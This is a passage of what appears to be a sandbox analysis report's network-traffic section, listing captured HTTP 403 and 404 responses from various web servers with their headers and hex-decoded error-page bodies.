6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 67 74 20 49 45 20 38 5d 3e 3c 21 2d 2d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 41 74 74 65 6e 74 69 6f 6e 20 52 65 71 75 69 72 65 64 21 20 7c 20 43 6c 6f 75 64 66 6c 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a Data Ascii: <!DOCTYPE html><!--[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]--><!--[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]--><!--[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]--><!--[if gt IE 8]><!--> <html class="no-js" lang="en-US"> <!--<![endif]--><head><title>Attention Required! | Cloudflare</title><meta charset="UTF-8" /><meta http-eq
              Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Length: 548Content-Type: text/htmlServer: Pepyaka/1.19.10X-Wix-Request-Id: 1694755683.46776487714183430154X-Content-Type-Options: nosniffAccept-Ranges: bytesDate: Fri, 15 Sep 2023 05:28:03 GMTX-Served-By: cache-iad-kjyo7100100-IADX-Cache: MISSX-Seen-By: yvSunuo/8ld62ehjr5B7kA==,pmHZlB45NPy7b1VBAukQrewfbs+7qUVAqsIx00yI78k=,m0j2EEknGIVUW/liY8BLLseIu4dGXwqDk+m1otFKtK/V0TBmJ+uLPQ4OZPC1VSMHVia: 1.1 googleData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 15 Sep 2023 05:28:03 GMTContent-Type: text/htmlContent-Length: 19268Connection: keep-aliveServer: ApacheLast-Modified: Fri, 13 May 2022 08:04:11 GMTAccept-Ranges: bytesData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 6a 61 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 68 74 6d 6c 2c 62 6f 64 79 2c 68 31 2c 70 20 7b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 62 6f 64 79 2c 68 74 6d 6c 20 7b 0a 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 20 42 6c 69 6e 6b 4d 61 63 53 79 73 74 65 6d 46 6f 6e 74 2c 20 59 61 6b 75 48 61 6e 4a 50 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 e3 83 92 e3 83 a9 e3 82 ae e3 83 8e e8 a7 92 e3 82 b4 e3 82 b7 e3 83 83 e3 82 af 2c 20 22 48 69 72 61 67 69 6e 6f 20 53 61 6e 73 22 2c 20 22 e3 83 92 e3 83 a9 e3 82 ae e3 83 8e e8 a7 92 e3 82 b4 20 50 72 6f 4e 20 57 33 22 2c 20 22 48 69 72 61 67 69 6e 6f 20 4b 61 6b 75 20 47 6f 74 68 69 63 20 50 72 6f 4e 22 2c 20 56 65 72 64 61 6e 61 2c 20 4d 65 69 72 79 6f 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 34 30 33 32 33 30 3b 0a 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 36 30 70 78 20 33 30 70 78 3b 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 77 69 64 74 68 3a 20 36 34 30 70 78 29 20 7b 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 31 30 30 70 78 20 33 30 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 20 20 6c 65 74 74 65 72 2d 73 70 61 63 69 6e 67 3a 20 30 2e 30 35 65 6d 3b 0a 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 2e 34 72 65 6d 3b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 32 30 70 78 3b 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 61 20 7b 0a 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 31 34 37 45 46 30 3b 0a 20 20 20 20 20 20 7d 0a 2
              Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Fri, 15 Sep 2023 05:28:03 GMTContent-Type: text/htmlContent-Length: 552Connection: keep-aliveVary: Accept-EncodingData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>openresty</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 15 Sep 2023 05:28:04 GMTServer: ApacheContent-Length: 315Content-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
              Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 15 Sep 2023 05:28:06 GMTContent-Type: text/plain; charset=UTF-8Content-Length: 16Connection: keep-aliveX-Frame-Options: SAMEORIGINReferrer-Policy: same-originCache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires: Thu, 01 Jan 1970 00:00:01 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=gVBLKqYfDcgYcMFEi9mLK6UHbycWkvBuWeq0Akb8uW4rDE2qWW6bZ13lnG25SBkwZZGBUGYsU7Rq%2Fk574yfLT4LJ%2B8uYN4FTwDAZnL289MW0G0I2aPv15jtV%2BEiE0CaB"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 806e76e02a0643a4-EWRalt-svc: h3=":443"; ma=86400Data Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 31 30 32 30 Data Ascii: error code: 1020
              Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 15 Sep 2023 05:28:06 GMTContent-Type: text/plain; charset=UTF-8Content-Length: 16Connection: keep-aliveX-Frame-Options: SAMEORIGINReferrer-Policy: same-originCache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires: Thu, 01 Jan 1970 00:00:01 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=e5kUmzhnA6xdQ4fWMNj8Ah6veaue%2FYt6HPggouUwczIiOCp%2B115M6M8LDnJMjPOYIzKzN0%2FQaEMQx4lMg9LJl9%2FUpLrASNJ5%2BK7V32mZizQSuFrsVgsZeotVGx64pXDv"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 806e76e0ca5743a4-EWRalt-svc: h3=":443"; ma=86400Data Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 31 30 32 30 Data Ascii: error code: 1020
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 15 Sep 2023 05:28:06 GMTContent-Type: text/html; charset=UTF-8Content-Length: 0Connection: keep-aliveX-Sorting-Hat-PodId: 171X-Sorting-Hat-ShopId: 61843439788Server-Timing: processing;dur=16X-Shopify-Stage: productionX-Content-Type-Options: nosniffX-Download-Options: noopenX-Permitted-Cross-Domain-Policies: noneX-XSS-Protection: 1; mode=blockX-Dc: gcp-us-east4,gcp-us-central1,gcp-us-central1X-Request-ID: bb1c4f7e-23e3-478c-bd5a-c09941c2083bCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=FFwIyvZq9kRZd%2FbMAjNzfBaPiOaQQUVZ%2Bqy3P0TB2yjpSHf6RkNrlKS9%2Fob3gIEwDaYeKJjdKN%2F2exnpKOtVHfqLZgPlTRw3qA96CzmU95F0Q6ORcGqQ5NC51x7fNR8UkQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}Server-Timing: cfRequestDuration;dur=65.000057Server: cloudflareCF-RAY: 806e76e1bf654388-EWRalt-svc: h3=":443"; ma=86400
              Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 15 Sep 2023 05:28:06 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, Keep-AliveAccept-Ranges: bytesContent-Length: 904Keep-Alive: timeout=5, max=100Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 63 73 73 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 46 65 68 6c 65 72 20 34 30 33 20 2d 20 5a 75 67 72 69 66 66 20 6e 69 63 68 74 20 67 65 73 74 61 74 74 65 74 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 68 72 65 66 3d 22 2f 6d 69 74 74 77 61 6c 64 5f 73 79 73 74 65 6d 5f 70 61 67 65 73 2f 63 73 73 2f 73 74 79 6c 65 2e 63 73 73 22 3e 20 20 20 0a 09 09 3c 21 2d 2d 5b 69 66 20 6c 74 65 20 49 45 20 36 5d 3e 0a 09 09 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 09 09 64 69 76 2c 20 69 6d 67 7b 20 62 65 68 61 76 69 6f 72 3a 75 72 6c 28 2f 6d 69 74 74 77 61 6c 64 5f 73 79 73 74 65 6d 5f 70 61 67 65 73 2f 73 63 72 69 70 74 73 2f 69 65 70 6e 67 66 69 78 2e 68 74 63 29 20 7d 0a 09 09 09 3c 2f 73 74 79 6c 65 3e 0a 09 09 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 09 3c 2f 68 65 61 64 3e 0a 09 3c 62 6f 64 79 3e 0a 09 09 3c 64 69 76 20 69 64 3d 22 62 6f 78 22 3e 0a 09 09 09 3c 64 69 76 20 69 64 3d 22 6f 62 65 6e 22 3e 3c 2f 64 69 76 3e 0a 09 09 09 3c 64 69 76 20 69 64 3d 22 74 65 78 74 62 6f 78 22 3e 0a 09 09 09 09 3c 64 69 76 20 69 64 3d 22 74 65 78 74 62 6f 78 63 6f 6e 74 65 6e 74 22 3e 0a 09 09 09 09 09 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 72 61 64 22 3e 26 6e 62 73 70 3b 3c 2f 73 70 61 6e 3e 20 20 0a 09 09 09 09 09 3c 68 31 3e 5a 75 67 72 69 66 66 20 6e 69 63 68 74 20 67 65 73 74 61 74 74 65 74 3c 2f 68 31 3e 20 20 20 20 20 20 20 20 20 20 20 0a 09 09 09 09 09 3c 70 3e 46 65 68 6c 65 72 20 34 30 33 20 2d 20 5a 75 67 72 69 66 66 20 6e 69 63 68 74 20 67 65 73 74 61 74 74 65 74 3c 62 72 20 2f 3e 0a 09 09 09 09 09 53 69 65 20 76 65 72 66 c3 bc 67 65 6e 20 6e 69 63 68 74 20 c3 bc 62 65 72 20 64 69 65 20 6e 6f 74 77 65 6e 64 69 67 65 6e 20 52 65 63 68 74 65 2c 20 64 69 65 20 61 6e 67 65 66 6f 72 64 65 72 74 65 20 53 65 69 74 65 20 7a 75 20 62 65 74 72 65 74 65 6e 2e 3c 62 72 20 2f 3e 0a 09 09 09 09 09 42 69 74 74 65 20 77 65 6e 64 65 6e 20 53 69 65 20 73 69 63 68 20 61 6e 20 64 65 6e 20 57 65 62 6d 61 73 74 65 72 2e 3c 2f 70 3e 0a 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 3c 2f 64 69 76 3e 0a 09 09 3c 64 69 76 20 69 64 3d 22 75 6e 74 65 6e 22 3e 3c 2f 64 69 76 3e 0a 09 09 3c 2f 64 69 76 3e 0a 09 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"><htm
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=us-asciiServer: Microsoft-HTTPAPI/2.0Date: Fri, 15 Sep 2023 05:28:07 GMTConnection: closeContent-Length: 315Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>
              Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveX-Cache-Status: Date: Fri, 15 Sep 2023 05:28:07 GMTCache-Control: no-storeCache-Control: no-cache, no-store, must-revalidateCache-Control: max-age=0X-Zen-Fury: ca72fefdc4a9f225b6d8bce8fe56075351795fe1Server: ZENEDGEData Raw: 32 61 61 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 20 69 66 20 28 74 79 70 65 6f 66 28 5f 5f 5f 7a 65 6e 29 20 3d 3d 3d 20 22 75 6e 64 65 66 69 6e 65 64 22 29 20 7b 73 65 74 54 69 6d 65 6f 75 74 28 61 72 67 75 6d 65 6e 74 73 2e 63 61 6c 6c 65 65 2c 20 35 30 29 3b 20 72 65 74 75 72 6e 3b 20 7d 5f 5f 5f 7a 65 6e 2e 68 69 63 28 22 5f 5f 5a 45 48 49 43 32 33 33 39 22 2c 20 31 36 39 34 37 35 35 36 33 36 2c 20 31 2c 20 30 2c 20 36 30 29 3b 20 7d 29 28 29 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 61 73 79 6e 63 3d 22 61 73 79 6e 63 22 20 73 72 63 3d 22 2f 5f 5f 7a 65 6e 65 64 67 65 2f 61 73 73 65 74 73 2f 68 69 63 2e 6a 73 3f 76 3d 31 36 37 34 32 30 37 34 32 32 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 63 65 6e 74 65 72 3e 3c 64 69 76 3e 3c 68 31 3e 34 30 33 3c 2f 68 31 3e 3c 2f 64 69 76 3e 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 61 73 79 6e 63 3d 22 61 73 79 6e 63 22 20 73 72 63 3d 22 2f 5f 5f 7a 65 6e 65 64 67 65 2f 61 73 73 65 74 73 2f 66 2e 6a 73 3f 76 3d 31 36 37 34 32 30 37 34 32 32 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 76 61 72 20 76 20 3d 20 31 36 39 34 37 35 35 35 37 32 20 2a 20 33 2e 31 34 31 35 39 32 36 35 33 35 38 39 38 3b 20 76 20 3d 20 4d 61 74 68 2e 66 6c 6f 6f 72 28 76 29 3b 20 64 6f 63 75 6d 65 6e 74 2e 63 6f 6f 6b 69 65 20 3d 20 22 5f 5f 7a 6a 63 34 34 30 30 3d 22 2b 76 2b 22 3b 20 65 78 70 69 72 65 73 3d 46 72 69 2c 20 31 35 20 53 65 70 20 32 30 32 33 20 30 35 3a 33 30 3a 30 37 20 55 54 43 3b 20 70 61 74 68 3d 2f 22 3b 20 7d 29 28 29 3c 2f 73 63 72 69 70 74 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: 2aa<html><head><title>403 Forbidden</title><script type="text/javascript">(function(){ if (typeof(___zen) === "undefined") {setTimeout(arguments.callee, 50); return; }___zen.hic("__ZEHIC2339", 1694755636, 1, 0, 60); })()</script><script type="text/javascript" async="async" src="/__zenedge/assets/hic.js?v=1674207422"></script></head><body><center><div><h1>403</h1></div><h1>Forbidden</h1></center><script type="text/javascript" async="async" src="/__zenedge/assets/f.js?v=1674207422"></script><script>(function () { var v = 1694755572 * 3.1415926535898; v = Math.floor(v); do
